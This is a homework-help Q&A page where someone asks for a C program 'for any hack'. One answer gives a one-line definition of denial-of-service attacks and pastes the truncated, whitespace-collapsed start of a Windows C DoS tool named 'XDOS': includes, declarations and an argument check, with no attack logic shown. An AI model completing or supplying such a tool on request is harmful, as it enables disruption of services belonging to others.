Computer Science, asked by Anonymous, 1 year ago

Write a C program for any hack​

Answers

Answered by devika9200
2
Are you sure your question is correct???
Do check it again
Answered by ganeshjothi747
2

Answer:

Explanation:

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. #define WIN32_LEAN_AND_MEAN#include <stdio.h>#include <windows.h>#include <winsock2.h>unsigned long thread = 0;static int connect_tv(struct sockaddr_in *addr, int timeout);static DWORD WINAPI dosmain(LPVOID p);const int main(int argc, char *argv[]){ if(argc != 4) { puts(“ttttXDOS – by […]

Similar questions